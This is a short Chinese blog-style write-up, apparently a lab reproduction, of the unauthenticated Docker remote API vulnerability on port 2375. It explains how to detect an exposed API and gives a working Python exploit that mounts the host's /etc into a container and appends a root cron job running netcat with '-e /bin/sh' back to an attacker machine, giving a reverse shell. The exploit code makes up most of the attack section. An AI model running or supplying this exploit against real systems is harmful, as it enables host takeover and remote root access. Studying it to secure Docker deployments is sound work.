提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档
前言
记录并复现常见的未授权访问漏洞
一、docker未授权访问漏洞是什么?
Docker API可以执行Docker命令,该接口是目的是取代Docker命令界面,通过URL操作Docker。常见端口2375
二、复现
1.环境搭建
如果访问如下页面,返回一个json格式的值{“message”:“page not found”}即存在漏洞也可以访问ip/version或者ip/info获取基本信息
2 漏洞利用
import docker
client = docker.DockerClient(base_url='http://192.168.1.8:2375/')
data = client.containers.run('alpine:latest', r'''sh -c "echo '* * * * * /usr/bin/nc 192.168.1.8 1111 -e /bin/sh' >> /tmp/etc/crontabs/root" ''', remove=True, volumes={'/etc': {'bind': '/tmp/etc', 'mode': 'rw'}})
通过该脚本写入计划任务进行反弹shell
执行完脚本,耐心等待一会才会反弹shell到kali主机,大约一分多钟时间。
该处使用的url网络请求的数据。